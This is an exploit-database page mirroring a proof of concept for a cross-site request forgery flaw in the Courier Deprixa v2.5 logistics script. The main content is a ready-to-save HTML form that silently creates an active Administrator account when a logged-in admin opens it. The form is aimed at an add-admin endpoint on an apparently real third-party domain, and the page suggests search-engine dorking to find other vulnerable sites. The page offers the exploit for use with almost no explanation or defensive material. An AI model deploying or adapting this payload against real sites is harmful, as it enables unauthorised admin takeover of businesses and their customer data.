Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070077

Below is a copy:

COURIER DEPRIXA V2.5 CSRF Vulnerability
====================================================================================================================================
| # Title     : COURIER DEPRIXA V2.5 CSRF Vulnerability                                                                            |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | 
| # Vendor    : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/                                               |  
| # Dork      :                                                                                                                    |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use Payload : save as poc.html

[+]  <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4>
  </div>
  <div class="modal-body">
  <!--Cuerpo del modal aqu el formulario-->
<form action="https://galaxyexpressuae.com/deprixa/settings/addusersadmin/agregar.php"  class="form-horizontal" method="post">
  <div class="form-group " id="gnombrepa">
<label for="off_name" class="col-sm-2 control-label">Name</label>
<div class="col-sm-10">
  <input type="text" class="form-control off_name" name="name_parson"  placeholder="Name Administrator ">
</div>
  </div>
  <div class="form-group" id="gapellido">
<label for="email" class="col-sm-2 control-label">Email </label>
<div class="col-sm-5">
  <input type="text" class="form-control email" name="email"   placeholder="Email ">
</div>
<div class="col-sm-5">
  <input class="form-control phone" name="phone" placeholder="Phone">  
</div>
  </div>
  <div class="form-group" id="gemail">
<label for="office" class="col-sm-2 control-label">Office</label>
<div class="col-sm-5">
  <input type="text" class="form-control office" name="office"  placeholder="Office ">
</div>
<div class="col-sm-5">
<select type="text" class="form-control role" name="role" >
  <option value="Administrator">Administrator</option>
</select>
</div>
  </div>
  <div class="form-group " id="gnombre">
<label for="off_name" class="col-sm-2 control-label">User</label>
<div class="col-sm-10">
  <input type="text" class="form-control off_name" name="name"  placeholder="User">
</div>
  </div>
  <div class="form-group" id="gpassword">
<label for="pwd" class="col-sm-2 control-label">Password</label>
<div class="col-sm-10">
  <input type="text" class="form-control pwd" name="pwd"  placeholder="Password">
</div>
  </div>
  <div class="form-group">
<div class="col-sm-offset-2 col-sm-10">
<div class="checkbox checkbox-success">
<input id="checkbox3" type="checkbox" name="estado" value="1" checked>
<label for="checkbox3">
Status
</label>
</div>
<div class="checkbox checkbox-inline" >
<input type="checkbox"  name="type" value="a" onclick="return false" checked>
<label for="inlineCheckbox3"> Type of user </label>
</div>
</div>
  </div>
<!--Fin del cuerpo del modal-->
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>
Close</button>
<input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">
</div>
</form>
</div>
  </div>
</div>
<!--Fuck up



Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.